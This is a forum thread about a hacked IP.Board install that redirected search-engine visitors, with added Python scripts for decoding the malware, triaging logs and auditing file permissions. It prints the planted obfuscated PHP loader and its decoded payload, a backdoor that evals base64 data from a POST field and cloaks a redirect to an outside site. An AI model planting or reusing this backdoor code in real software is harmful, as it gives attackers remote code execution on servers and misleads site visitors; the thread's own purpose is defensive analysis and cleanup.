Annon

RSS Feeds Link Problem


I hate that site. I don't use the RSS but if you search this site via google, that site shows up very often, like the first click of every search.


Yes, it happened to me too, very strange. Is the forum hacked or what?

I am using google reader

Edited by renochew


Same, Google Reader.

Just happened to me now, it seems the links expire.

Admins?


Hey guys

This was something that used to hit us on the old forum. I believe it's a hack/vulnerability in the software. I fixed the old one, now I'm going to have to track it down again in the new software.

Sorry about that, it will hopefully be fixed soon.

M


Hey

I tracked down the problem. It was hidden in a cache file for the forum. I've cleaned up the hacked code and it should be fixed now. I still haven't managed to track down how they're getting in, so it might pop up again. I'm going to keep searching for the backdoor, but in the meantime if it crops up again then please let me know.

Thanks

Marc

P.S. If anyone's interested, this is the code that was screwing everyone up:


// Dropped into the board's generated skin cache (intefor names the file further down:
// cache/skin_cache/cacheid_1/skin_global.php), so it executes on every page view.
// $k is the POST field name of the backdoor; the decoded code checks $_POST[$k].
$k='b2488714339183624a45a9373ae8d945';
// Stage 2 as a substitution-cipher blob: strtr($mds,$jsa,$jsb) maps each
// character of $jsa to the character at the same position in $jsb.
$mds='O7Agi6;AxO2IXFOB@FOiDZ"&Dfg[A/&a,JnsjfgvkZ,_;vo)A<&[Jf/IAJo)B~E"A}"cO~4ckUF"AJoP;ZR$Jf/~Bv&~B~Bx%U"KDZ"@Dfz7,_&gBsD7Bs%sLTlcj=_c,0VcB=ogFUE"J_C^{_4;DZ(Fk}ggFvRxkZDVBf{foR&",<o7,Z{@B=4~J=D7FTWakU4]{W&./Rx"A_)ck}"KDe{&neC~,<F];<R)wfE@D~o0;=4uB=Cc,Z/~]Zo~wJFx]eoxFJDP]egV;v4gOUocD~P"J_oR{g,R{gxs}R4{{R&/{)/}J)Re4{${D_)cj~4v^{CPwJDa,/&_BvP@DR&.4/D<4/D;D)V{/RC]{"/Z4/DR{0FFk.x"wa_lDZ,;DfV7B=nsJ.x"B>_lBeDg,_&(wJ4>AUEsYfzcFv/BLvo7;Jzs;f&s;Z/BLsz$w<V7;_P[]ZDc;vB[wf&(]egV;v4gORP[Bs/uBvR(wvzgBgP[Bs/uwvRc,e/BL0ocD~P"w~"KDZE&DR&.4/D<4/D;D)V{/RC]}W&./UFFj~40^}4)AZgaL.$a,J4)A<$sB_xswf&7AfggJfg"D_)KDZB&DZY[D=ogB=oc;f$]A<nsj~4g^}40L0Fxw<$sJfg"Dax",T_g;JC)O}E"J_oR{g,R{gxs}R4{{R&wJ)_^<0FFk.(c,0Vg;JC)O}E"J)o^.)(D4/x",/)ckJ(c,0VcB=ogFUE"J)FR/RxsAJC0F0FFk}wvkURg;JC)O}E"J)FR/Rxs,~FFk}"vD0EV,<_PFe"@DR&T.)&L}{/;DZFFk}"cOfgvkU4>^.)"AUgKA<w@DZncBf/)wf&7AfggkU4gLUFg;0BxFZg(,}Ecka%f%TlPk.x";._aF<DaFeY@;<n_kU4@k}PPLTEcj=C~A<$)kUD";fo_;</[FU$x;foVFZg7;>)sAe4)BT@7L=/~;T4aAZ&~FU$c;v,7L=x";J)sY0"K]</IAJnK]<gvkUEVDe{cD0w"B0gKDWgnn"V{.{P[^}YuBfo~AJC)Ye4$BZ{&D=4gOen7AvRfwJo>BvgPFUBEB=D>^}FKDe4@AJ%(^sogFe4c;vFa<~F0;fR~,R&_BvPsJJ)7A<$",JE[BZVP^fgPwsw&O~4)AZgaL.$~,<FcB=4~O})`BV3iI=N`;=/)Be/)L.$V;s4cnfR>AZ/YwJo@]},V;JlK,a_SB~B`BV3iI=N`^U&aw=DcBen`BV3iI=N`Y>(&]nNNq';
$jsa='jEK!u>WQ^CfRP98_%Xwtk&;5qJh0?1Nz{Zi:/vd[s|cO@#-<+=]M"o`y.UAmrG*aeg,2}Tbl(Fx~4SB$3YDIHLn7)pV6';
$jsb='Og7+8jE>PB2Fw`~1M_Y#K9b-;X=i]|)xUG(<Vm&un%peo^}W*3f:kN.?TCa!,{[zHlZ6SD"AtdsyRqc5rIJ4/LQv0$h@';
// substr($mds,213,1) is 'e', so the pattern becomes '#c#e'. The e modifier
// (PHP 5; removed in PHP 7) makes preg_replace() eval() the replacement string,
// and the subject 'css' contains one 'c', so the unscrambled code runs exactly once.
$i='#c#'.substr($mds,213,1);
$ipd=preg_replace($i,strtr($mds,$jsa,$jsb),'css');

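To see what the loader actually does, here is an added Python decoder (my own example, not code from the thread) that replays the two operations the loader performs: the strtr() translation with the two 92-character tables, and the regex modifier picked out of $mds. The character at offset 213 is e, so the pattern handed to preg_replace() is #c#e, and the e modifier (PHP 5 only; removed in PHP 7) runs the replacement string as PHP code once c matches in the subject css. That replacement string translates to eval(@base64_decode( ... )); around the base64 of the PHP that intefor posts later in the thread. No quotes survive around that argument in the posted copy; the base64 text consists only of identifier characters, which PHP 5 would still accept as a bareword constant evaluating to its own name (the @ hides the notice), and the + characters base64 needs are spliced in as .chr(43). because + is not in the substitution alphabet. The script stops at the PHP source and executes none of it.

```python
import base64

# The three strings exactly as they appear in the loader posted above.
MDS = 'O7Agi6;AxO2IXFOB@FOiDZ"&Dfg[A/&a,JnsjfgvkZ,_;vo)A<&[Jf/IAJo)B~E"A}"cO~4ckUF"AJoP;ZR$Jf/~Bv&~B~Bx%U"KDZ"@Dfz7,_&gBsD7Bs%sLTlcj=_c,0VcB=ogFUE"J_C^{_4;DZ(Fk}ggFvRxkZDVBf{foR&",<o7,Z{@B=4~J=D7FTWakU4]{W&./Rx"A_)ck}"KDe{&neC~,<F];<R)wfE@D~o0;=4uB=Cc,Z/~]Zo~wJFx]eoxFJDP]egV;v4gOUocD~P"J_oR{g,R{gxs}R4{{R&/{)/}J)Re4{${D_)cj~4v^{CPwJDa,/&_BvP@DR&.4/D<4/D;D)V{/RC]{"/Z4/DR{0FFk.x"wa_lDZ,;DfV7B=nsJ.x"B>_lBeDg,_&(wJ4>AUEsYfzcFv/BLvo7;Jzs;f&s;Z/BLsz$w<V7;_P[]ZDc;vB[wf&(]egV;v4gORP[Bs/uBvR(wvzgBgP[Bs/uwvRc,e/BL0ocD~P"w~"KDZE&DR&.4/D<4/D;D)V{/RC]}W&./UFFj~40^}4)AZgaL.$a,J4)A<$sB_xswf&7AfggJfg"D_)KDZB&DZY[D=ogB=oc;f$]A<nsj~4g^}40L0Fxw<$sJfg"Dax",T_g;JC)O}E"J_oR{g,R{gxs}R4{{R&wJ)_^<0FFk.(c,0Vg;JC)O}E"J)o^.)(D4/x",/)ckJ(c,0VcB=ogFUE"J)FR/RxsAJC0F0FFk}wvkURg;JC)O}E"J)FR/Rxs,~FFk}"vD0EV,<_PFe"@DR&T.)&L}{/;DZFFk}"cOfgvkU4>^.)"AUgKA<w@DZncBf/)wf&7AfggkU4gLUFg;0BxFZg(,}Ecka%f%TlPk.x";._aF<DaFeY@;<n_kU4@k}PPLTEcj=C~A<$)kUD";fo_;</[FU$x;foVFZg7;>)sAe4)BT@7L=/~;T4aAZ&~FU$c;v,7L=x";J)sY0"K]</IAJnK]<gvkUEVDe{cD0w"B0gKDWgnn"V{.{P[^}YuBfo~AJC)Ye4$BZ{&D=4gOen7AvRfwJo>BvgPFUBEB=D>^}FKDe4@AJ%(^sogFe4c;vFa<~F0;fR~,R&_BvPsJJ)7A<$",JE[BZVP^fgPwsw&O~4)AZgaL.$~,<FcB=4~O})`BV3iI=N`;=/)Be/)L.$V;s4cnfR>AZ/YwJo@]},V;JlK,a_SB~B`BV3iI=N`^U&aw=DcBen`BV3iI=N`Y>(&]nNNq'
JSA = 'jEK!u>WQ^CfRP98_%Xwtk&;5qJh0?1Nz{Zi:/vd[s|cO@#-<+=]M"o`y.UAmrG*aeg,2}Tbl(Fx~4SB$3YDIHLn7)pV6'
JSB = 'Og7+8jE>PB2Fw`~1M_Y#K9b-;X=i]|)xUG(<Vm&un%peo^}W*3f:kN.?TCa!,{[zHlZ6SD"AtdsyRqc5rIJ4/LQv0$h@'


def php_strtr(subject, frm, to):
    """PHP strtr($subject, $from, $to): a single pass in which every character of
    `frm` becomes the character at the same index of `to` and all others are left
    alone. PHP ignores the tail of the longer table; both tables here are 92 long."""
    n = min(len(frm), len(to))
    return subject.translate(str.maketrans(frm[:n], to[:n]))


def decode_loader(mds=MDS, jsa=JSA, jsb=JSB):
    """Reproduce what the loader hands to preg_replace() and unwrap it one layer."""
    modifier = mds[213]                     # substr($mds,213,1)
    pattern = '#c#' + modifier              # '#c#e': the e modifier evals the replacement
    stage2 = php_strtr(mds, jsa, jsb)       # the replacement string, i.e. the real code
    head, tail = 'eval(@base64_decode(', '));'
    if not (stage2.startswith(head) and stage2.endswith(tail)):
        raise ValueError('unexpected stage-2 shape: ' + stage2[:40])
    # '+' is absent from the substitution alphabet, so the base64 text splices it
    # in as .chr(43). ; restore it, and the padding the blob omits.
    b64 = stage2[len(head):-len(tail)].replace('.chr(43).', '+')
    b64 += '=' * (-len(b64) % 4)
    payload = base64.b64decode(b64).decode('latin-1')
    return {'modifier': modifier, 'pattern': pattern,
            'stage2': stage2, 'payload': payload}


if __name__ == '__main__':
    result = decode_loader()
    print('pattern:', result['pattern'])
    print(result['payload'])
```

Run it with python3 and it prints the pattern followed by the PHP source of the payload, which is the one-line original of the code intefor pasted with line breaks.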

Thanks Marc, hate people hacking around to screw others. Or is it because this forum software is not that popular/well-maintained?

This was also showing for already opened tabs from odforce, with no way to know the address of the thread. I will let you know if I see it again :)


I still haven't managed to track down how they're getting in, so it might pop up again. I'm going to keep searching for the backdoor, but in the meantime if it crops up again then please let me know.

Is it possible that the webserver itself is rooted via other means? eg. brute force remote root password guessing via ssh


Btw I just saw the same problem again. Not sure if I have to update anything but after searching this site on google and clicking the first link, it appeared again. Just FYI :)


Thanks Marc, hate people hacking around to screw others. Or is it because this forum software is not that popular/well-maintained?

I've researched this quite a lot and this hack is showing up in this forum, WordPress, vBulletin and a bunch of other popular pieces of software out there. Unfortunately there doesn't seem to be any idea of how it's happening.

Is it possible that the webserver itself is rooted via other means? eg. brute force remote root password guessing via ssh

I've scoured the logs and there's no sign of anyone logging in via ssh other than myself, however it is possible. I suspect they got in through a vulnerability in the software and have left a backdoor somewhere. As you can see by the code I posted above, it's not exactly obvious what to look for. I've found some scripts on the server that allow someone complete access to all the files in the webroot on the server. Scary, but almost impossible to track down.

I'll keep looking though, thanks for letting me know it's back.

M



Thank you so much Marc.

I've got the same problem.

Following your code, I searched and found that the file /cache/skin_cache/cacheid_1/skin_global.php is infected. I rebuilt the skin and the file is overwritten.

I don't know how hackers can change that file. Could you please give me some advice?


I have just decoded that script, and got:

$i='ini_set';
if(function_exists($i)){
  $i('display_errors',0);   // hide PHP errors so a broken payload never shows on the page
  $i('log_errors',0);
}
// Backdoor: $k is the hex key set by the loader above; any POST carrying that
// field name has its value un-rot13'd, base64-decoded and eval'd.
if(isset($_POST[$k]))eval(base64_decode(str_rot13($_POST[$k])));
$u=@preg_match('#bot|spider|crawl|slurp|yandex#i',$_SERVER['HTTP_USER_AGENT']);  // crawler?
$f=@parse_url($_SERVER['HTTP_REFERER']);
$c=@$f['host'];
$r=@preg_match('#live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.#i',$c);  // arrived from a search engine?
$h=$_SERVER['HTTP_HOST'];
$b=$this->settings['cookie_id'];   // the board's own cookie prefix, so the names blend in
$g=$b.'session_id';
$e=$b.'lang_id';                   // marker cookie: "already redirected"
$d=empty($_SERVER['HTTP_X_MOZ']);  // false for Firefox link-prefetch requests
if(empty($_COOKIE[$e])){
  // Stage 2: the follow-up request with ipbv and g parameters, a forum session
  // cookie and a same-host referer gets the 10-hour marker cookie and a JavaScript
  // redirect; any other request of that shape gets an empty response.
  if(isset($_GET['ipbv'])&&(!empty($_GET['g']))&&(!empty($_COOKIE[$g]))){
    if($c==$h){
      if($d)setcookie($e,'en',time()+36000);
      $m=substr(md5($h),0,8);        // per-site tag in the redirect URL
      print("document.location='http://url4short.info/{$m}'");
    }
    exit;}
  // Stage 1: a non-crawler arriving from a search engine gets something appended
  // to the page output; the appended string is empty in this copy of the post.
  if((!$u)&&$r){$IPBHTML.="";}
}

Following the above code, the problem will occur again 10 hours (= 36000 / 60 / 60) after the last click from a search engine (not just Google but Yahoo, Bing, Baidu, ...).

We can check the 'lang_id' cookie: if it exists (and is equal to 'en'), the system may be infected by that virus.

Edited by intefor

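The conditions in that payload decide who ever sees the redirect, which is why admins arriving by bookmark or by typing the URL never reproduced it and search crawlers always got the clean page. The following is an added example of mine, not code from the thread: it lifts those conditions into a classify() function and runs it over a few constructed combined-format access log lines (the hostnames, addresses and the g=js value are made up) so that the stage-1 landing hits and the stage-2 redirect requests can be picked out of a web log after the fact. Logs carry no cookies, so the session-cookie and lang_id checks are exposed as parameters rather than inferred.

```python
import hashlib
import re
from urllib.parse import parse_qs, urlparse

# Patterns copied from the decoded payload.
BOT_RE = re.compile(r'bot|spider|crawl|slurp|yandex', re.I)
SEARCH_RE = re.compile(r'live\.com|google\.|yahoo\.|bing.com|yandex\.ru|rambler\.ru|baidu\.', re.I)
# Apache/nginx "combined" log format.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')


def redirect_target(host):
    """Where stage 2 sends the browser: the first 8 hex digits of md5(host) as a per-site tag."""
    return 'http://url4short.info/' + hashlib.md5(host.encode()).hexdigest()[:8]


def classify(site_host, target, referer, ua, has_lang_cookie=False, has_session_cookie=True):
    """Apply the payload's conditions to one request and report what it would have got:
    'suppressed'       lang_id marker cookie present (set for 10 h after a redirect)
    'stage2-redirect'  ipbv + g query, forum session cookie, referer on this host: JS redirect
    'stage2-blank'     same request shape but referer elsewhere: exit() with an empty body
    'stage1-injected'  non-crawler browser arriving from a search engine: extra markup appended
    'clean'            everything else, including every crawler"""
    if has_lang_cookie:
        return 'suppressed'
    query = parse_qs(urlparse(target).query, keep_blank_values=True)  # isset() counts empty values
    ref_host = urlparse(referer).hostname or ''
    if 'ipbv' in query and query.get('g', [''])[0] and has_session_cookie:
        return 'stage2-redirect' if ref_host == site_host else 'stage2-blank'
    if not BOT_RE.search(ua) and SEARCH_RE.search(ref_host):
        return 'stage1-injected'
    return 'clean'


def triage_log(site_host, lines):
    """Run classify() over combined-format lines; return (ip, target, verdict) for non-clean hits."""
    hits = []
    for line in lines:
        m = COMBINED.match(line.strip())
        if not m:
            continue
        verdict = classify(site_host, m['target'], m['referer'], m['ua'])
        if verdict != 'clean':
            hits.append((m['ip'], m['target'], verdict))
    return hits


# Constructed sample lines (hosts, addresses and the g=js value are made up).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2012:10:00:00 +0000] "GET /topic/1-rss/ HTTP/1.1" 200 8421 '
    '"http://www.google.com/search?q=rss" "Mozilla/5.0 (Windows NT 6.1; rv:9.0) Gecko/20100101 Firefox/9.0"',
    '203.0.113.5 - - [01/Jan/2012:10:00:01 +0000] "GET /index.php?ipbv=abc123&g=js HTTP/1.1" 200 61 '
    '"http://forum.example/topic/1-rss/" "Mozilla/5.0 (Windows NT 6.1; rv:9.0) Gecko/20100101 Firefox/9.0"',
    '66.249.66.1 - - [01/Jan/2012:10:05:00 +0000] "GET /topic/1-rss/ HTTP/1.1" 200 8421 '
    '"-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '198.51.100.7 - - [01/Jan/2012:10:06:00 +0000] "GET /topic/1-rss/ HTTP/1.1" 200 8421 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64) Chrome/16.0"',
    '198.51.100.7 - - [01/Jan/2012:10:06:05 +0000] "GET /public/style_css/ipb_common.css?ipbv=abc123 HTTP/1.1" 200 1200 '
    '"http://forum.example/topic/1-rss/" "Mozilla/5.0 (X11; Linux x86_64) Chrome/16.0"',
]

if __name__ == '__main__':
    for hit in triage_log('forum.example', SAMPLE_LOG):
        print(hit)
    print('redirect target for forum.example:', redirect_target('forum.example'))
```

Only the first visitor shows up: the search landing on the topic page and, one second later, the ipbv/g request that got the redirect. The crawler, the member coming from a bookmark and the board's own ipbv-tagged stylesheet request all classify as clean, which is the cloaking working as designed.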

Hey

Yeah I've managed to track down the problem itself, but sadly I haven't managed to discover the root of the problem (ie the source of infection). My solution to get rid of it was to change the ownership of all my php files/directories to the php user (which is 'nobody' in my case). Happily we're on a VPS, so this works and now no-one has permissions to change any of my files anymore. If you're on a shared server then I don't think this solution would work for you.

But yeah. I don't know how they manage to insert code into the forum cache files. I wish I did, I hate not knowing how they're getting in :).

M

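Marc's fix relies on file ownership and permissions, so the useful follow-up check is whether the account PHP runs as can still modify anything under the web root. Here is an added Python audit of mine (not from the thread) that evaluates mode bits the way the kernel does for a given uid and group set, and also flags files that are read-only themselves but sit in a directory that account can write, since a writable directory lets the file be unlinked and recreated. The demo builds a throwaway tree under the temp directory (a constructed layout, not odforce's) and audits it as the current user standing in for the PHP worker; on a real box you would pass the worker's uid and groups, for example those of nobody or www-data.

```python
import os
import shutil
import stat
import tempfile


def can_write(mode, owner_uid, owner_gid, uid, gids):
    """Would an account (uid, member of gids) be allowed to write an inode with
    these mode bits? Same class selection as the kernel's DAC check: owner bits if
    the uid matches, else group bits if any group matches, else the "other" bits.
    uid 0 is deliberately not special-cased; PHP must not run as root anyway."""
    if uid == owner_uid:
        return bool(mode & stat.S_IWUSR)
    if owner_gid in gids:
        return bool(mode & stat.S_IWGRP)
    return bool(mode & stat.S_IWOTH)


def audit_webroot(root, uid, gids):
    """Walk root and return {path: reason} for everything the account could change:
    writable files and directories, plus read-only entries inside a writable
    directory, which can be unlinked and recreated with attacker content."""
    findings = {}
    for dirpath, dirnames, filenames in os.walk(root):
        d = os.lstat(dirpath)
        dir_writable = can_write(d.st_mode, d.st_uid, d.st_gid, uid, gids)
        if dir_writable:
            findings.setdefault(dirpath, 'directory writable: entries can be replaced')
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # the link target is judged where the walk reaches it
            if can_write(st.st_mode, st.st_uid, st.st_gid, uid, gids):
                findings[path] = ('directory writable: entries can be replaced'
                                  if stat.S_ISDIR(st.st_mode) else 'file writable')
            elif dir_writable:
                findings[path] = 'replaceable via parent directory'
    return findings


# Constructed demo layout (not the forum's tree): path -> (mode, content, None for a directory)
DEMO_LAYOUT = {
    'public': (0o555, None),
    'cache': (0o755, None),
    'index.php': (0o444, '<?php echo "hello"; ?>'),
    'public/style.css': (0o644, 'body{}'),
    'cache/skin_global.php': (0o444, '<?php /* rebuilt skin cache */ ?>'),
}


def demo_audit():
    """Build DEMO_LAYOUT in a temp dir, audit it as the current user (standing in for
    the PHP worker account), clean up, and return findings keyed by relative path."""
    root = tempfile.mkdtemp(prefix='webroot-')
    try:
        for rel, (_, content) in DEMO_LAYOUT.items():
            path = os.path.join(root, rel)
            if content is None:
                os.mkdir(path)
            else:
                with open(path, 'w') as fh:
                    fh.write(content)
        for rel, (mode, _) in DEMO_LAYOUT.items():
            os.chmod(os.path.join(root, rel), mode)  # set after creation so umask cannot interfere
        os.chmod(root, 0o555)
        found = audit_webroot(root, os.getuid(), set(os.getgroups()) | {os.getgid()})
        return {os.path.relpath(p, root): why for p, why in found.items()}
    finally:
        os.chmod(root, 0o700)
        for rel, (_, content) in DEMO_LAYOUT.items():
            path = os.path.join(root, rel)
            if os.path.lexists(path):
                os.chmod(path, 0o700 if content is None else 0o600)
        shutil.rmtree(root)


if __name__ == '__main__':
    for rel, why in sorted(demo_audit().items()):
        print(f'{why:45} {rel}')
```

The demo reports style.css (owner-writable), the cache directory (owner-writable) and skin_global.php inside it (read-only, but replaceable through its parent), and stays silent about index.php and public, which are read-only in a read-only directory. A file that the PHP account owns with the owner write bit set is flagged exactly like a world-writable one.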

Thanks Marc, I stopped seeing the issue long ago, so whatever you did works :)

